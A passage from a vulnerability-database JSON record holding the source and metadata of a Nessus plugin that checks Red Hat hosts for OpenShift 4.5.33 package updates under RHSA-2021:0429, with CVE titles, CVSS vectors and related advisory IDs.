value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:conmon", "p-cpe:/a:redhat:enterprise_linux:jenkins", "p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:runc"], "solution": "Update the affected packages.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-21605", "vpr": {"risk factor": "Medium", "score": "6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-03T00:00:00", "vulnerabilityPublicationDate": "2020-05-14T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T12:06:10", "differentElements": ["cpe", "description", "modified", "sourceData", "title"], "edition": 9}], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0719", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2021:0429", "RHSA-2021:0637", "RHSA-2020:2618", "RHSA-2020:4961"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2020-3_0-0099_APACHE.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "REDHAT-RHSA-2021-0637.NASL", "OPENSUSE-2020-1022.NASL", "REDHAT-RHSA-2021-0423.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JUL_2020.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "EULEROS_SA-2020-2327.NASL", "FREEBSD_PKG_6D5F1B0BB86548D5935B3FB6EBB425FC.NASL", "ORACLE_BPM_CPU_OCT_2020.NASL", "FEDORA_2020-2640AA4E19.NASL", "EULEROS_SA-2020-1794.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "GENTOO_GLSA-202011-18.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-52741B0A49.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2021.NASL", "EULEROS_SA-2020-1915.NASL", "GENTOO_GLSA-202007-34.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "UBUNTU_USN-4380-1.NASL", "PHOTONOS_PHSA-2020-1_0-0298_APACHE.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JUL_2020_CPU.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2021.NASL", "JENKINS_2_274.NASL", "JENKINS_2_276.NASL", "FEDORA_2020-7F07DA3FEF.NASL", "FEDORA_2020-92B1D001B3.NASL", "EULEROS_SA-2020-2132.NASL"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5", "ASA-202101-41"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21610", "RH:CVE-2021-21602", "RH:CVE-2020-11979", "RH:CVE-2021-21607", "RH:CVE-2021-21615", "RH:CVE-2021-21606", "RH:CVE-2021-21604", "RH:CVE-2020-1945", "RH:CVE-2021-21609", "RH:CVE-2021-21608", "RH:CVE-2021-21603", "RH:CVE-2021-21605", "RH:CVE-2021-21611"]}, {"type": "cve", "idList": ["CVE-2021-21608", "CVE-2021-21603", "CVE-2021-21602", "CVE-2021-21610", "CVE-2021-21604", "CVE-2021-21611", "CVE-2021-21606", "CVE-2021-21607", "CVE-2020-11979", "CVE-2021-21605", "CVE-2021-21609", "CVE-2021-21615", "CVE-2020-1945"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-11979"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "gentoo", "idList": ["GLSA-202007-34", "GLSA-202011-18"]}, {"type": "fedora", "idList": ["FEDORA:88EAA30905CF", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:52396606732B", "FEDORA:6869030D3139"]}, {"type": "photon", "idList": ["PHSA-2020-1.0-0335", "PHSA-2020-2.0-0247", "PHSA-2020-1.0-0298", "PHSA-2020-3.0-0099", "PHSA-2020-2.0-0291", "PHSA-2020-3.0-0155", "PHSA-2021-4.0-0036"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2020", "ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2021"]}], "modified": "2021-10-07T23:48:09", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-10-07T23:48:09", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/07\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 